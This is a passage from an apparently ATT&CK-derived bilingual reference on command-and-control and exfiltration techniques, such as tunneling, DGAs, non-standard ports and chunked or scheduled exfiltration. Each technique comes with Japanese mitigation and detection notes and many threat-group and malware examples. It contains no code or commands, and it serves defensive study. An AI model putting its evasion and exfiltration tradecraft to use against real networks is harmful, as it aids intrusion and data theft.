and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access modules/features may also exist as part of otherwise existing software such as Zoom or Google Chrome’s Remote Desktop. 敵対者は、リモートアクセス用ハードウェアを悪用することがある。An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based keyboard, video, or mouse (KVM) devices such as TinyPilot and PiKVM, are commonly used as legitimate tools and may be allowed by peripheral device policies within a target environment. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ハードウェアの接続を制限し、不正な機器の導入を防ぐ。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 許可されていないコードの実行を防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 リモートアクセスツールに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used several remote administration tools as persistent infiltration channels. During Operation AkaiRyū, MirrorFace used remote access tools including PuTTY. Carbanak used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems. Sandworm Team has used remote administration tools or remote industrial control system client software for execution and to maliciously release electricity breakers. FIN7 has utilized the remote management tool Atera to download malware to a compromised system. OilRig has incorporated remote monitoring and management (RMM) tools into their operations including ngrok. Cobalt Group used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost. DarkVishnya used DameWare Mini Remote Control for lateral movement. GOLD SOUTHFIELD has used the cloud-based remote management and monitoring tool "ConnectWise Control" to deploy REvil. TeamTNT has established tmate sessions for C2 communications. Akira uses legitimate utilities such as AnyDesk and PuTTy for maintaining remote access to victim environments. INC Ransom has used AnyDesk and PuTTY on compromised systems. BlackByte has used tools such as AnyDesk in victim environments. Medusa Group has leveraged Remote Access Software for lateral movement and data exfiltration. Medusa Group has also been known to utilize Remote Access Software such as AnyDesk, Atera, ConnectWise, eHorus, N-Able, PDQ Deploy, PDQ Inventory, SimpleHelp and Splashtop. Carbanak has a plugin for VNC and Ammyy Admin Tool. RTM has the capability to download a VNC module from command and control (C2). TrickBot uses vncDll module to remote control the victim machine. Dridex contains a module for VNC. Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines. Hildegard has established tmate sessions for C2 communications. InvisibleFerret has utilized remote access software including AnyDesk client through the “adc” module. InvisibleFerret has also downloaded the AnyDesk client should it not already exist on the compromised host by searching for `C:/Program Files(x86)/AnyDesk/AnyDesk.exe`. 敵対者は、DGAやFast Flux等でC2の宛先を動的に解決し、遮断を回避することがある。 Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. 敵対者は、Fast FluxでC2ドメインのIPを高速に変化させることがある。Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record. 敵対者は、DGAでC2ドメインを動的生成し遮断を回避することがある。Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions. 敵対者は、DNS応答を計算に用いてC2宛先を導出することがある。Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel. 危険なWebコンテンツへのアクセスを制限する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 動的解決に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used dynamic DNS services for C2. For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure. For Operation Dust Storm, the threat actors used dynamic DNS domains from a variety of free providers, including No-IP, Oray, and 3322. During the SolarWinds Compromise, APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2. During C0026, the threat actors re-registered a ClouDNS dynamic DNS subdomain which was previously used by ANDROMEDA. During Indian Critical Infrastructure Intrusions, RedEcho used dynamic DNS domains associated with malicious infrastructure. APT29 has used Dynamic DNS providers for their malware C2 infrastructure. Gamaredon Group has incorporated dynamic DNS domains in its infrastructure. Kimsuky has used Dynamic DNS (DDNS) services, such as FreeDNS or No-IP DDNS, to include servers located in South Korea. APT-C-36 has used DDNS services such as DuckDNS, noip[.]com, and con-ip[.]com to redirect victims to sites or repositories hosting malware implants. Transparent Tribe has used dynamic DNS services to set up C2. BITTER has used DDNS for C2 communications. TA2541 has used dynamic DNS services for C2 infrastructure. RedEcho used dynamic DNS domains associated with malicious infrastructure. NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2. RTM has resolved Pony C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain. Bisonal has used a dynamic DNS service for C2. Remcos has used dynamic DNS domains in C2 communications. Maze has forged POST strings with a random choice from a list of possibilities including "forum", "php", "view", etc. while making connection with the C2, hindering detection efforts. SUNBURST dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain. Gelsemium can use dynamic DNS domain names in C2. Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2. AsyncRAT can be configured to use dynamic DNS. BRICKSTORM has utilized DNS services sslip.io and nip.io to resolve C2 IP addresses. 敵対者は、プロトコルに通常使われない非標準ポートでC2通信を行うことがある。 Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data. ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 非標準ポートに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, the threat actors used uncommon high ports for its backdoor C2, including ports 25667 and 47000. During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections. During the C0032 campaign, TEMP.Veles used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2. KV Botnet Activity generates a random port number greater than 30,000 to serve as the listener for subsequent command and control activity. During Indian Critical Infrastructure Intrusions, RedEcho used non-standard ports such as TCP 8080 for HTTP communication. Quad7 Activity has used non-standard TCP ports – such as 7777, 11288, 63256, 63210, 3256, and 3556 for C2. During RedPenguin, UNC3886 used a backdoor that binds to port 45678 by default. During the 2025 Poland Wiper Attacks, the adversaries had created a Reverse SOCKS Proxy and communicated over the non-standard port 8008. Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches. Sandworm Team has used port 6789 to accept connections on the group's SSH server. FIN7 has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2. FIN7 has used TCP ports 59999 and 9898 for firewall rules. Gamaredon Group has used port 6856 for C2 communications. An APT32 backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration. Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP. APT33 has used HTTP over TCP ports 808 and 880 for command and control. MuddyWater has used ports 8043 and 8848 for botnet C2 communication. WIRTE has used HTTPS over ports 2083 and 2087 for C2. Silence has used port 444 when sending data about the system from the client to the server. APT-C-36 has used port 4050 for C2 communications. DarkVishnya used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2. Rocke's miner connects to a C2 server using port 51640. Ember Bear has used various non-standard ports for C2 communication. RedEcho has used non-standard ports such as TCP 8080 for HTTP communication. Velvet Ant has used random high number ports for PlugX listeners on victim devices. Contagious Interview has used TCP port 1224 for C2. PlugX has used random, high-number, non-standard ports to listen for subsequent actions and C2 activities. Derusbi has used unencrypted HTTP on port 443 for C2. RTM used Port 44443 for its VNC module. MoonWind communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports. RedLeaves can use HTTP over non-standard ports, such as 995, for C2. GravityRAT has used HTTP over a non-standard port, such as TCP port 46769. Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method. BADCALL communicates on ports 443 and 8000 with a FakeTLS method. HARDRAIN binds and listens on port 443 with a FakeTLS method. QuasarRAT can use port 4782 on the compromised host for TCP callbacks. TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method. Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443. OSX_OCEANLOTUS.D has used a custom binary protocol over TCP port 443 for C2. Emotet has used HTTP over ports such as 20, 22, 443, 7080, and 50000, in addition to using ports commonly associated with HTTP/S. HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method. njRAT has used port 1177 for HTTP C2 communications. ZxShell can use ports 1985 and 1986 in HTTP/S communication. PoetRAT used TLS to encrypt communications over port 143 Metamorfo has communicated with hosts over raw TCP on port 9999. StrongPity has used HTTPS over port 1402 in C2 communication. GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files. WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications. BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2. Cyclops Blink can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic. MacMa has used TCP port 5633 for C2 Communication. PingPull can use HTTPS over port 8080 for C2. SUGARUSH has used port 4585 for a TCP connection to its C2. RotaJakiro uses a custom binary protocol over TCP port 443. Sardonic has the ability to connect with actor-controlled C2 servers using a custom binary protocol over port 443. Raspberry Robin will communicate via HTTP over port 8080 for command and control traffic. Pikabot uses non-standard ports, such as 2967, 2223, and others, for HTTPS command and control communication. Covenant listeners and controllers can be configured to use non-standard ports. Hannotog uses non-standard listening ports, such as UDP 5900, for command and control purposes. VIRTUALPITA has created listeners on hard coded TCP ports such as 2233, 7475, and 18098. VIRTUALPIE has created listeners on hard coded TCP port 546. InvisibleFerret has been observed utilizing HTTP communications to the C2 server over ports 1224, 2245 and 8637. BeaverTail has communicated with C2 IP addresses over ports 1224 or 1244. The server component of SystemBC has used various TCP ports for C2 communication. GlassWorm has distributed C2 using BitTorrent’s Distributed Hash Table (DHT) network to harness a decentralized command capability. HiddenFace's passive mode listens on TCP 47000. SPAWNCHIMERA has the ability to bind on a localhost and listen on port 8300. 敵対者は、別プロトコル内にC2通信をトンネリングして隠蔽することがある。 Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 プロトコルトンネリングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain. During C0027, Scattered Spider used SSH tunneling in targeted environments. During Cutting Edge, threat actors used Iodine to tunnel IPv4 traffic over DNS. During the C0032 campaign, TEMP.Veles used encrypted SSH-based PLINK tunnels to transfer tools and enable RDP connections throughout the environment. During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed the GOGETTER tunneler software to establish a “Yamux” TLS-based C2 channel with an external server(s). During SharePoint ToolShell Exploitation, threat actors utilized ngrok tunnels to deliver PowerShell payloads. FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers. FIN7 has tunneled C2 traffic via OpenSSH. OilRig has used the Plink utility and other tools to create tunnels to C2 servers. Magic Hound has used Plink to tunnel RDP over SSH. Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure. Cobalt Group has used the Plink utility to create SSH tunnels. Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS. Fox Kitten has used protocol tunneling for communication and RDP activity on compromised hosts through the use of open source tools such as ngrok and custom tool SSHMinion. Mustang Panda has leveraged OpenSSH (sshd.exe) to execute commands, transfer files and spread across the environment communicating over SMB port 445. Ember Bear has used ProxyChains to tunnel protocols to internal networks. Scattered Spider has installed protocol-tunneling tools on VMware vCenter and adversary-controlled VMs, including Teleport.sh, Chisel (configured to communicate with trycloudflare[.]com subdomains), MobaXterm, ngrok, Pinggy, and Teleport. FIN13 has utilized web shells and Java tools for tunneling capabilities to and from compromised assets. Cinnamon Tempest has used the Iox and NPS proxy and tunneling tools in combination create multiple connections through a single tunnel. Salt Typhoon has modified device configurations to create and use Generic Routing Encapsulation (GRE) tunnels. VOID MANTICORE has used tunneling tools to facilitate destructive attacks on compromised devices. Uroburos has the ability to communicate over custom communications methodologies that ride over common network protocols including raw TCP and UDP sockets, HTTP, SMTP, and DNS. Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols. Cobalt Strike uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports. FLIPSIDE uses RDP to tunnel traffic from a victim environment. ngrok can tunnel RDP and other services securely over internet connections. Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel. The QakBot proxy module can encapsulate SOCKS5 protocol within its own proxy protocol. Cyclops Blink can use DNS over HTTPS (DoH) to resolve C2 nodes. Mythic can use SOCKS proxies to tunnel traffic through another protocol. Milan can use a custom protocol tunneled through DNS or HTTP. Kevin can use a custom protocol tunneled through DNS or HTTP. Heyoka Backdoor can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers. FunnyDream can connect to HTTP proxies via TCP to create a tunnel to C2. Brute Ratel C4 can use DNS over HTTPS for C2. LunarWeb can run a custom binary protocol under HTTPS for C2. FRP can tunnel SSH and Unix Domain Socket communications over TCP between external nodes and exposed resources behind firewalls or NAT. reGeorg can tunnel TCP sessions including RDP, SSH, and SMB through HTTP. Neo-reGeorg can tunnel data in and out of targeted networks. BRICKSTORM has utilized a SOCKS proxy to tunnel access within the victim network and exfiltrate files from internal shares, code repositories, and other endpoints. BRICKSTORM has also leveraged Yamux for combining multiple concurrent logical streams over a single a socket. HiddenFace can hide its IP lookup by using DNS over HTTPS (DoH) for C2. SPAWNCHIMERA has created SSH tunnels to facilitate C2 communications. 敵対者は、対称/非対称暗号を用いてC2通信を暗号化することがある。 Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files. 敵対者は、対称鍵暗号でC2通信を暗号化することがある。Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4. 敵対者は、公開鍵暗号でC2通信を暗号化することがある。Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. SSL/TLS通信を検査し、暗号化された悪意ある通信を検出する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 暗号化チャネルに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 In the Triton Safety Instrumented System Attack, TEMP.Veles used cryptcat binaries to encrypt their traffic. KV Botnet Activity command and control activity includes transmission of an RSA public key in communication from the server, but this is followed by subsequent negotiation stages that represent a form of handshake similar to TLS negotiation. APT29 has used multiple layers of encryption within malware to protect C2 communication. Magic Hound has used an encrypted http proxy in C2 communications. Tropic Trooper has encrypted traffic with the C2 to prevent network detection. BITTER has encrypted their C2 communications. gh0st RAT has encrypted TCP communications to evade detection. NETWIRE can encrypt C2 communications. Emotet has encrypted data before sending to the C2 server. Cryptoistic can engage in encrypted communications with C2. Chaes has used encryption for its C2 channel. RCSession can use an encrypted beacon to check in with C2. Lizar can support encrypted communications between the client and server. PowerLess can use an encrypted channel for C2 communications. MacMa has used TLS encryption to initialize a custom protocol for C2 communications. PowGoop can receive encrypted commands from C2. Gomir uses a custom encryption algorithm for content sent to command and control infrastructure. 敵対者は、通信経路上のコンテンツに悪意ある内容を注入してC2や配送を行うことがある。 Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., Drive-by Target followed by Drive-by Compromise), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., Ingress Tool Transfer) and other data to already compromised systems. 危険なWebコンテンツへのアクセスを制限する。 機微情報を暗号化し、窃取時の影響を軽減する。 コンテンツインジェクションに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 MoustachedBouncer has injected content into DNS, HTTP, and SMB replies to redirect specifically-targeted victims to a fake Windows Update page to download malware. Disco has achieved initial access and execution through content injection into DNS, HTTP, and SMB replies to targeted hosts that redirect them to download malicious files. 敵対者は、C2インフラの所在や性質を隠蔽することがある。 Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished by identifying and filtering traffic from defensive tools, masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers, and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely. インフラの隠蔽に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 set the hostnames of their C2 infrastructure to match legitimate hostnames in the victim environment. They also used IP addresses originating from the same country as the victim for their VPN infrastructure. Quad7 Activity has rotated the compromised SOHO IPs used in password spraying activity to hamper detection and network blocking activities by defenders. During Operation Digital Eye, threat actors used public Cloud infrastructure to mask malicious activity. APT29 uses compromised residential endpoints, typically within the same ISP IP address range, as proxies to hide the true source of C2 traffic. ZIRCONIUM has utilized an ORB (operational relay box) network – consisting compromised devices such as small office and home office (SOHO) routers, IoT devices, and leased virtual private servers (VPS) – to obfuscate the origin of C2 traffic. DarkGate command and control includes hard-coded domains in the malware masquerading as legitimate services such as Akamai CDN or Amazon Web Services. UPSTYLE attempts to retrieve a non-existent webpage from the command and control server resulting in hidden commands sent via resulting error messages. JumbledPath can use a chain of jump hosts to communicate with compromised devices to obscure actor infrastructure. 敵対者は、C2チャネルとは別のネットワーク媒体を用いてデータを持ち出そうとすることがある。C2が有線ネットワーク経由なら、Wi-FiやセルラーモデムやBluetooth等の別媒体で流出させうる。 Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. 敵対者は、C2とは別にBluetoothを用いてデータを持ち出そうとすることがある。Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel. OSを安全に構成し、攻撃対象領域を縮小する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 他のネットワーク媒体経由の持ち出しに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、収集段階で集めた機密文書等のデータを、自動処理によって持ち出すことがある。 Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 敵対者は、トラフィックミラーリングを悪用してデータ持ち出しを自動化することがある。Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. 自動持ち出しに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2. ArcaneDoor included scripted exfiltration of collected data. During Salesforce Data Exfiltration, threat actors used API queries to automatically exfiltrate large volumes of data. Ke3chang has performed frequent and scheduled data exfiltration from compromised networks. Gamaredon Group has used modules that automatically upload gathered documents to the C2 server. Tropic Trooper has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage. Kimsuky has exfiltrated data to C2 servers using an automated script that executes every 10 minutes and after successful checks for the presence of pre-designated staged filenames. Sidewinder has configured tools to automatically send collected files to attacker controlled servers. Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP. RedCurl has used batch scripts to exfiltrate data. CosmicDuke exfiltrates collected files automatically over FTP to remote servers. Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe. When a document is found matching one of the extensions in the configuration, TINYTYPHON uploads it to the C2 server. USBStealer automatically exfiltrates collected files via removable media when an infected device connects to an air-gapped victim machine after initially being connected to an internet-enabled victim machine. Empire has the ability to automatically send collected data back to the threat actors' C2. If credentials are not collected for two weeks, Ebury encrypts the credentials using a public key and sends them via UDP to an IP address located in the DNS TXT record. LightNeuron can be configured to automatically exfiltrate files under a specified directory. Machete’s collected files are exfiltrated automatically to remote servers. Attor has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server. ShimRatReporter sent collected system and network information compiled into a report to an adversary-controlled C2. TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2. StrongPity can automatically exfiltrate collected documents to the C2 server. Crutch has automatically exfiltrated stolen files to Dropbox. Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL. Peppy has the ability to automatically exfiltrate files and keylogs. OutSteel can automatically upload collected files to its C2 server. Raccoon Stealer will automatically collect and exfiltrate data identified in received configuration files from command and control nodes. Solar can automatically exfitrate files from compromised systems. StrelaStealer automatically sends gathered email credentials following collection to command and control servers via HTTP POST. Hannotog can upload encyrpted data for exfiltration. 敵対者は、特定の時間帯や一定間隔でのみデータ持ち出しを行うようスケジュールすることがある。正常なトラフィックに紛れさせる狙いがある。 Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 スケジュールされた転送に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes. ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes. ComRAT has been programmed to sleep outside local business hours (9 to 5, Monday to Friday). Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval. Dipsind can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic. Linfo creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure. POWERSTATS can sleep for a given number of seconds. Kazuar can sleep for a specific time and be set to communicate at specific intervals. jRAT can be configured to reconnect at certain intervals. LightNeuron can be configured to exfiltrate data during nighttime or working hours. Machete sends stolen data to the C2 server every 10 minutes. ShimRat can sleep when instructed to do so by the C2. ShadowPad has sent data back to C2 every 8 hours. Chrommme can set itself to sleep before requesting a new command from C2. TinyTurla contacts its C2 based on a scheduled timing set in its configuration. Flagpro has the ability to wait for a specified time interval between communicating with and executing commands from C2. Shark can pause C2 communications for a specified time. Ninja can configure its agent to work only in specific time frames. 敵対者は、ファイル全体ではなく固定サイズのチャンクで持ち出したり、パケットサイズを閾値以下に抑えたりすることがある。検知の回避が狙い。 An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 データ転送サイズ制限に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration. During C0026, the threat actors split encrypted archives containing stolen files and information into 3MB parts prior to exfiltration. APT28 has split archived exfiltration files into chunks smaller than 1MB. Threat Group-3390 actors have split RAR files for exfiltration into parts. APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection. LuminousMoth has split archived files into multiple parts to bypass a 5MB limit. Play has split victims' files into chunks for exfiltration. Carbanak exfiltrates data in compressed chunks if a message is larger than 4096 bytes . POSHSPY uploads data in 2048-byte chunks. Cobalt Strike will break large data sets into smaller chunks for exfiltration. Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server. OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks. Kessel can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries. RDAT can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. RDAT can also download data from the C2 which is split into 81,920-byte portions. AppleSeed has divided files if the size is 0x1000000 bytes or more. ObliqueRAT can break large files of interest into smaller chunks to prepare them for exfiltration. Mythic supports custom chunk sizes used to upload/download files. Kevin can exfiltrate data to the C2 server in 27-character chunks. The Rclone "chunker" overlay supports splitting large files in smaller chunks during upload to circumvent size limits. LunarWeb can split exfiltrated data that exceeds 1.33 MB in size into multiple random sized parts between 384 and 512 KB. StealBit can be configured to exfiltrate files at a specified rate to evade network detection mechanisms. 敵対者は、既存のC2チャネル上でデータを持ち出すことがある。窃取データは通常のC2通信にエンコードして紛れ込ませる。 Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 DLPでデータの不正な持ち出しを検出・防止する。 C2チャネル経由の持ち出しに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2. During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers. During Operation Wocao, threat actors used the XServer backdoor to exfiltrate data. During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration. During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers. During HomeLand Justice, threat actors used HTTP to transfer data from compromised Exchange servers. ArcaneDoor included use of existing command and control channels for data exfiltration. Leviathan exfiltrated collected data over existing command and control channels during Leviathan Australian Intrusions. During RedPenguin, UNC3886 uploaded specified files from compromised devices to a remote server. During SharePoint ToolShell Exploitation, threat actors exfiltrated stolen credentials and internal data over HTTPS to C2 infrastructure. Ke3chang transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations. APT3 has a tool that exfiltrates data over the C2 channel. Lazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware. Sandworm Team has sent system information to its C2 server using HTTP. After data is collected by Stealth Falcon malware, it is exfiltrated over the existing C2 channel. A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server. APT32's backdoor has exfiltrated data using the already opened channel with its C&C server. Leviathan has exfiltrated data over its C2 channel. MuddyWater has used C2 infrastructure to receive exfiltrated data. APT39 has exfiltrated stolen victim data through C2 communications. WIRTE has exfiltrated collected victim data to C2 infrastructure. GALLIUM used Web shells and HTRAN for C2 and to exfiltrate data. Kimsuky has exfiltrated data over its C2 channel. Wizard Spider has exfiltrated domain credentials and network enumeration information over command and control (C2) channels. Chimera has used Cobalt Strike C2 beacons for data exfiltration. Higaisa exfiltrated data over its C2 channel. ZIRCONIUM has exfiltrated files via the Dropbox API C2. Mustang Panda has exfiltrated stolen data and files to its C2 server. Confucius has exfiltrated stolen files to its C2 server. CURIUM has used IMAP and SMTPS for exfiltration via tools such as IMAPLoader. LuminousMoth has used malware that exfiltrates stolen data to its C2 server. Scattered Spider has exfiltrated data from compromised VMware vCenter servers through an established C2 channel using the Teleport remote access tool. Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers. Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP. BlackByte transmitted collected victim host information via HTTP POST to command and control infrastructure. Contagious Interview has exfiltrated data from a compromised host to actor-controlled C2 servers. VOID MANTICORE malware has exfiltrated collected data via Telegram bot C2 channels using encrypted communications. PlugX has exfiltrated stolen data and files to its C2 server. Dyre has the ability to send information staged on a compromised host externally to C2. Adversaries can direct BACKSPACE to upload files to the C2 Server. NETEAGLE is capable of reading files over the C2 channel. ADVSTORESHELL exfiltrates data over the same channel used for C2. DustySky has exfiltrated data to the C2 server. CallMe exfiltrates data to its C2 server over the same protocol as C2 communications. Psylo exfiltrates data to its C2 